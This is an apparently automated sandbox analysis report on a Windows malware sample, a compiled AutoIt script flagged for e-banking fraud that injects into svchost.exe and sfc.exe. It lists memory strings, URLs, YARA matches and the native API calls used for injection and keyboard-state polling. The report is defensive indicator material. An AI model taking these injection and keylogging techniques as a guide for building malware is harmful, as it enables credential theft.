                Source: sfc.exe, 00000003.00000003.1355808324.0000000008178000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
                Source: sfc.exe, 00000003.00000002.3336452699.0000000006670000.00000004.00000800.00020000.00000000.sdmp, sfc.exe, 00000003.00000002.3334519746.00000000051AA000.00000004.10000000.00040000.00000000.sdmp, 5JxkCj4eQRzcmUJqY16X4Zy.exe, 00000005.00000002.3333782638.00000000046CA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/gtm.js?id=
                Source: sfc.exe, 00000003.00000002.3336452699.0000000006670000.00000004.00000800.00020000.00000000.sdmp, sfc.exe, 00000003.00000002.3334519746.00000000051AA000.00000004.10000000.00040000.00000000.sdmp, 5JxkCj4eQRzcmUJqY16X4Zy.exe, 00000005.00000002.3333782638.00000000046CA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/ns.html?id=GTM-NP3MFSK
                Source: sfc.exe, 00000003.00000002.3336452699.0000000006670000.00000004.00000800.00020000.00000000.sdmp, sfc.exe, 00000003.00000002.3334519746.00000000051AA000.00000004.10000000.00040000.00000000.sdmp, 5JxkCj4eQRzcmUJqY16X4Zy.exe, 00000005.00000002.3333782638.00000000046CA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/domainnames/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa
                Source: sfc.exe, 00000003.00000002.3336452699.0000000006670000.00000004.00000800.00020000.00000000.sdmp, sfc.exe, 00000003.00000002.3334519746.00000000051AA000.00000004.10000000.00040000.00000000.sdmp, 5JxkCj4eQRzcmUJqY16X4Zy.exe, 00000005.00000002.3333782638.00000000046CA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkin
                Source: sfc.exe, 00000003.00000002.3336452699.0000000006670000.00000004.00000800.00020000.00000000.sdmp, sfc.exe, 00000003.00000002.3334519746.00000000051AA000.00000004.10000000.00040000.00000000.sdmp, 5JxkCj4eQRzcmUJqY16X4Zy.exe, 00000005.00000002.3333782638.00000000046CA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingwe
                Source: sfc.exe, 00000003.00000002.3336452699.0000000006670000.00000004.00000800.00020000.00000000.sdmp, sfc.exe, 00000003.00000002.3334519746.00000000051AA000.00000004.10000000.00040000.00000000.sdmp, 5JxkCj4eQRzcmUJqY16X4Zy.exe, 00000005.00000002.3333782638.00000000046CA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park
                Source: sfc.exe, 00000003.00000002.3336452699.0000000006670000.00000004.00000800.00020000.00000000.sdmp, sfc.exe, 00000003.00000002.3334519746.00000000051AA000.00000004.10000000.00040000.00000000.sdmp, 5JxkCj4eQRzcmUJqY16X4Zy.exe, 00000005.00000002.3333782638.00000000046CA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/order/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw
                Source: sfc.exe, 00000003.00000002.3336452699.0000000006670000.00000004.00000800.00020000.00000000.sdmp, sfc.exe, 00000003.00000002.3334519746.00000000051AA000.00000004.10000000.00040000.00000000.sdmp, 5JxkCj4eQRzcmUJqY16X4Zy.exe, 00000005.00000002.3333782638.00000000046CA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/sitebuilder/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa
                Source: sfc.exe, 00000003.00000002.3336452699.0000000006670000.00000004.00000800.00020000.00000000.sdmp, sfc.exe, 00000003.00000002.3334519746.00000000051AA000.00000004.10000000.00040000.00000000.sdmp, 5JxkCj4eQRzcmUJqY16X4Zy.exe, 00000005.00000002.3333782638.00000000046CA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/support?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parking
                Source: sfc.exe, 00000003.00000002.3336452699.0000000006670000.00000004.00000800.00020000.00000000.sdmp, sfc.exe, 00000003.00000002.3334519746.00000000051AA000.00000004.10000000.00040000.00000000.sdmp, 5JxkCj4eQRzcmUJqY16X4Zy.exe, 00000005.00000002.3333782638.00000000046CA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/woocommerce/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa
                Source: sfc.exe, 00000003.00000002.3336452699.0000000006670000.00000004.00000800.00020000.00000000.sdmp, sfc.exe, 00000003.00000002.3334519746.00000000051AA000.00000004.10000000.00040000.00000000.sdmp, 5JxkCj4eQRzcmUJqY16X4Zy.exe, 00000005.00000002.3333782638.00000000046CA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/wordpress/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park
                Source: sfc.exe, 00000003.00000002.3336452699.0000000006670000.00000004.00000800.00020000.00000000.sdmp, sfc.exe, 00000003.00000002.3334519746.00000000051AA000.00000004.10000000.00040000.00000000.sdmp, 5JxkCj4eQRzcmUJqY16X4Zy.exe, 00000005.00000002.3333782638.00000000046CA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.se?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb
                Source: sfc.exe, 00000003.00000002.3334519746.0000000005018000.00000004.10000000.00040000.00000000.sdmp, 5JxkCj4eQRzcmUJqY16X4Zy.exe, 00000005.00000002.3333782638.0000000004538000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://wx.longwaysun.com/app/register.php?site_id=2
                Source: sfc.exe, 00000003.00000002.3334519746.0000000005018000.00000004.10000000.00040000.00000000.sdmp, 5JxkCj4eQRzcmUJqY16X4Zy.exe, 00000005.00000002.3333782638.0000000004538000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://wx.longwaysun.com/app/register.php?site_id=2239&topId=96442/gwiz/
                Source: C:\Users\user\Desktop\g1V10ssekg.exeCode function: 0_2_0013001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_0013001C
                Source: C:\Users\user\Desktop\g1V10ssekg.exeCode function: 0_2_0015CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0015CABC

                E-Banking Fraud

                barindex
                Source: Yara matchFile source: 1.2.svchost.exe.310000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.svchost.exe.310000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000001.00000002.1161823504.0000000000310000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.3333620772.00000000032E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1170054720.00000000063C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.3333538380.0000000003250000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.3332033711.0000000000B90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.3333539059.0000000002C90000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1162534386.0000000003350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Source: C:\Users\user\Desktop\g1V10ssekg.exeCode function: This is a third-party compiled AutoIt script.0_2_000D3B3A
                Source: g1V10ssekg.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                Source: g1V10ssekg.exe, 00000000.00000002.894316452.0000000000184000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_7a1f7b38-1
                Source: g1V10ssekg.exe, 00000000.00000002.894316452.0000000000184000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_4da379d2-8
                Source: g1V10ssekg.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_f6205691-d
                Source: g1V10ssekg.exeString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_9000b6f5-6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0033CD13 NtClose,1_2_0033CD13
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072B60 NtClose,LdrInitializeThunk,1_2_03072B60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072DF0 NtQuerySystemInformation,LdrInitializeThunk,1_2_03072DF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030735C0 NtCreateMutant,LdrInitializeThunk,1_2_030735C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03074340 NtSetContextThread,1_2_03074340
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03074650 NtSuspendThread,1_2_03074650
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072B80 NtQueryInformationFile,1_2_03072B80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072BA0 NtEnumerateValueKey,1_2_03072BA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072BE0 NtQueryValueKey,1_2_03072BE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072BF0 NtAllocateVirtualMemory,1_2_03072BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072AB0 NtWaitForSingleObject,1_2_03072AB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072AD0 NtReadFile,1_2_03072AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072AF0 NtWriteFile,1_2_03072AF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072F30 NtCreateSection,1_2_03072F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072F60 NtCreateProcessEx,1_2_03072F60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072F90 NtProtectVirtualMemory,1_2_03072F90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072FA0 NtQuerySection,1_2_03072FA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072FB0 NtResumeThread,1_2_03072FB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072FE0 NtCreateFile,1_2_03072FE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072E30 NtWriteVirtualMemory,1_2_03072E30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072E80 NtReadVirtualMemory,1_2_03072E80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072EA0 NtAdjustPrivilegesToken,1_2_03072EA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072EE0 NtQueueApcThread,1_2_03072EE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072D00 NtSetInformationFile,1_2_03072D00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072D10 NtMapViewOfSection,1_2_03072D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072D30 NtUnmapViewOfSection,1_2_03072D30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072DB0 NtEnumerateKey,1_2_03072DB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072DD0 NtDelayExecution,1_2_03072DD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072C00 NtQueryInformationProcess,1_2_03072C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072C60 NtCreateKey,1_2_03072C60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072C70 NtFreeVirtualMemory,1_2_03072C70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072CA0 NtQueryInformationToken,1_2_03072CA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072CC0 NtQueryVirtualMemory,1_2_03072CC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072CF0 NtOpenProcess,1_2_03072CF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03073010 NtOpenDirectoryObject,1_2_03073010
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03073090 NtSetValueKey,1_2_03073090
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030739B0 NtGetContextThread,1_2_030739B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03073D10 NtOpenProcessToken,1_2_03073D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03073D70 NtOpenThread,1_2_03073D70
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 3_2_036C4340 NtSetContextThread,LdrInitializeThunk,3_2_036C4340
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 3_2_036C4650 NtSuspendThread,LdrInitializeThunk,3_2_036C4650
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 3_2_036C2B60 NtClose,LdrInitializeThunk,3_2_036C2B60
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 3_2_036C2BE0 NtQueryValueKey,LdrInitializeThunk,3_2_036C2BE0
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 3_2_036C2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,3_2_036C2BF0
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 3_2_036C2BA0 NtEnumerateValueKey,LdrInitializeThunk,3_2_036C2BA0
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 3_2_036C2AF0 NtWriteFile,LdrInitializeThunk,3_2_036C2AF0
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 3_2_036C2AD0 NtReadFile,LdrInitializeThunk,3_2_036C2AD0
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 3_2_036C2F30 NtCreateSection,LdrInitializeThunk,3_2_036C2F30
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 3_2_036C2FE0 NtCreateFile,LdrInitializeThunk,3_2_036C2FE0
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 3_2_036C2FB0 NtResumeThread,LdrInitializeThunk,3_2_036C2FB0
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 3_2_036C2EE0 NtQueueApcThread,LdrInitializeThunk,3_2_036C2EE0
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 3_2_036C2E80 NtReadVirtualMemory,LdrInitializeThunk,3_2_036C2E80
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 3_2_036C2D30 NtUnmapViewOfSection,LdrInitializeThunk,3_2_036C2D30
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 3_2_036C2D10 NtMapViewOfSection,LdrInitializeThunk,3_2_036C2D10
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 3_2_036C2DF0 NtQuerySystemInformation,LdrInitializeThunk,3_2_036C2DF0
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 3_2_036C2DD0 NtDelayExecution,LdrInitializeThunk,3_2_036C2DD0
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 3_2_036C2C60 NtCreateKey,LdrInitializeThunk,3_2_036C2C60
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 3_2_036C2C70 NtFreeVirtualMemory,LdrInitializeThunk,3_2_036C2C70
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 3_2_036C2CA0 NtQueryInformationToken,LdrInitializeThunk,3_2_036C2CA0
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 3_2_036C35C0 NtCreateMutant,LdrInitializeThunk,3_2_036C35C0
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 3_2_036C39B0 NtGetContextThread,LdrInitializeThunk,3_2_036C39B0
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 3_2_036C2B80 NtQueryInformationFile,3_2_036C2B80
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 3_2_036C2AB0 NtWaitForSingleObject,3_2_036C2AB0
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 3_2_036C2F60 NtCreateProcessEx,3_2_036C2F60
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 3_2_036C2FA0 NtQuerySection,3_2_036C2FA0
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 3_2_036C2F90 NtProtectVirtualMemory,3_2_036C2F90
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 3_2_036C2E30 NtWriteVirtualMemory,3_2_036C2E30
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 3_2_036C2EA0 NtAdjustPrivilegesToken,3_2_036C2EA0
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 3_2_036C2D00 NtSetInformationFile,3_2_036C2D00
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 3_2_036C2DB0 NtEnumerateKey,3_2_036C2DB0
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 3_2_036C2C00 NtQueryInformationProcess,3_2_036C2C00
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 3_2_036C2CF0 NtOpenProcess,3_2_036C2CF0
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 3_2_036C2CC0 NtQueryVirtualMemory,3_2_036C2CC0
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 3_2_036C3010 NtOpenDirectoryObject,3_2_036C3010
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 3_2_036C3090 NtSetValueKey,3_2_036C3090
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 3_2_036C3D70 NtOpenThread,3_2_036C3D70
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 3_2_036C3D10 NtOpenProcessToken,3_2_036C3D10
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 3_2_00BB95D0 NtCreateFile,3_2_00BB95D0
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 3_2_00BB9740 NtReadFile,3_2_00BB9740
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 3_2_00BB98D0 NtClose,3_2_00BB98D0
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 3_2_00BB9830 NtDeleteFile,3_2_00BB9830
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 3_2_00BB9A30 NtAllocateVirtualMemory,3_2_00BB9A30
                Source: C:\Users\user\Desktop\g1V10ssekg.exeCode function: 0_2_00133D61: CreateFileW,DeviceIoControl,CloseHandle,0_2_00133D61
                Source: C:\Users\user\Desktop\g1V10ssekg.exeCode function: 0_2_00128310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00128310
                Source: C:\Users\user\Desktop\g1V10ssekg.exeCode function: 0_2_001351BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_001351BD
                Source: C:\Users\user\Desktop\g1V10ssekg.exeCode function: 0_2_000DE6A00_2_000DE6A0
                Source: C:\Users\user\Desktop\g1V10ssekg.exeCode function: 0_2_000FD9750_2_000FD975
                Source: C:\Users\user\Desktop\g1V10ssekg.exeCode function: 0_2_000DFCE00_2_000DFCE0
                Source: C:\Users\user\Desktop\g1V10ssekg.exeCode function: 0_2_000F21C50_2_000F21C5
                Source: C:\Users\user\Desktop\g1V10ssekg.exeCode function: 0_2_001062D20_2_001062D2
                Source: C:\Users\user\Desktop\g1V10ssekg.exeCode function: 0_2_0010242E0_2_0010242E
                Source: C:\Users\user\Desktop\g1V10ssekg.exeCode function: 0_2_000F25FA0_2_000F25FA
                Source: C:\Users\user\Desktop\g1V10ssekg.exeCode function: 0_2_0012E6160_2_0012E616
                Source: C:\Users\user\Desktop\g1V10ssekg.exeCode function: 0_2_000E66E10_2_000E66E1
                Source: C:\Users\user\Desktop\g1V10ssekg.exeCode function: 0_2_0010878F0_2_0010878F
                Source: C:\Users\user\Desktop\g1V10ssekg.exeCode function: 0_2_000E88080_2_000E8808
                Source: C:\Users\user\Desktop\g1V10ssekg.exeCode function: 0_2_001508570_2_00150857
                Source: C:\Users\user\Desktop\g1V10ssekg.exeCode function: 0_2_001068440_2_00106844
                Source: C:\Users\user\Desktop\g1V10ssekg.exeCode function: 0_2_001388890_2_00138889
                Source: C:\Users\user\Desktop\g1V10ssekg.exeCode function: 0_2_000FCB210_2_000FCB21
                Source: C:\Users\user\Desktop\g1V10ssekg.exeCode function: 0_2_00106DB60_2_00106DB6
                Source: C:\Users\user\Desktop\g1V10ssekg.exeCode function: 0_2_000E6F9E0_2_000E6F9E
                Source: C:\Users\user\Desktop\g1V10ssekg.exeCode function: 0_2_000E30300_2_000E3030
                Source: C:\Users\user\Desktop\g1V10ssekg.exeCode function: 0_2_000F31870_2_000F3187
                Source: C:\Users\user\Desktop\g1V10ssekg.exeCode function: 0_2_000FF1D90_2_000FF1D9
                Source: C:\Users\user\Desktop\g1V10ssekg.exeCode function: 0_2_000D12870_2_000D1287
                Source: C:\Users\user\Desktop\g1V10ssekg.exeCode function: 0_2_000F14840_2_000F1484
                Source: C:\Users\user\Desktop\g1V10ssekg.exeCode function: 0_2_000E55200_2_000E5520
                Source: C:\Users\user\Desktop\g1V10ssekg.exeCode function: 0_2_000F76960_2_000F7696
                Source: C:\Users\user\Desktop\g1V10ssekg.exeCode function: 0_2_000E57600_2_000E5760
                Source: C:\Users\user\Desktop\g1V10ssekg.exeCode function: 0_2_000F19780_2_000F1978
                Source: C:\Users\user\Desktop\g1V10ssekg.exeCode function: 0_2_00109AB50_2_00109AB5
                Source: C:\Users\user\Desktop\g1V10ssekg.exeCode function: 0_2_000F1D900_2_000F1D90
                Source: C:\Users\user\Desktop\g1V10ssekg.exeCode function: 0_2_000FBDA60_2_000FBDA6
                Source: C:\Users\user\Desktop\g1V10ssekg.exeCode function: 0_2_00157DDB0_2_00157DDB
                Source: C:\Users\user\Desktop\g1V10ssekg.exeCode function: 0_2_000DDF000_2_000DDF00
                Source: C:\Users\user\Desktop\g1V10ssekg.exeCode function: 0_2_000E3FE00_2_000E3FE0
                Source: C:\Users\user\Desktop\g1V10ssekg.exeCode function: 0_2_020535F00_2_020535F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00328B931_2_00328B93
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_003131C01_2_003131C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_003112201_2_00311220
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_003203331_2_00320333
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0032032C1_2_0032032C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0033F3731_2_0033F373
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_003123E01_2_003123E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_003123DC1_2_003123DC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00312CB21_2_00312CB2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00312CC01_2_00312CC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_003205531_2_00320553
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0031E5431_2_0031E543
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00326D931_2_00326D93
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00326D8E1_2_00326D8E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0031E6931_2_0031E693
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0031E6871_2_0031E687
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_003127B01_2_003127B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_003147F41_2_003147F4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030FA3521_2_030FA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304E3F01_2_0304E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031003E61_2_031003E6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030C02C01_2_030C02C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030301001_2_03030100
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030DA1181_2_030DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030C81581_2_030C8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030F41A21_2_030F41A2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031001AA1_2_031001AA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031021AE1_2_031021AE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030F81CC1_2_030F81CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030D20001_2_030D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030647501_2_03064750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030407701_2_03040770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303C7C01_2_0303C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305C6E01_2_0305C6E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030405351_2_03040535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031005911_2_03100591
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030E44201_2_030E4420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030F24461_2_030F2446
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030EE4F61_2_030EE4F6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030FAB401_2_030FAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030FEB891_2_030FEB89
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030F6BD71_2_030F6BD7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303EA801_2_0303EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030569621_2_03056962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030429A01_2_030429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304A8401_2_0304A840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030268B81_2_030268B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306E8F01_2_0306E8F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03082F281_2_03082F28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03060F301_2_03060F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030E2F301_2_030E2F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B4F401_2_030B4F40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030BEFA01_2_030BEFA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03032FC81_2_03032FC8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030FEE261_2_030FEE26
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03052E901_2_03052E90
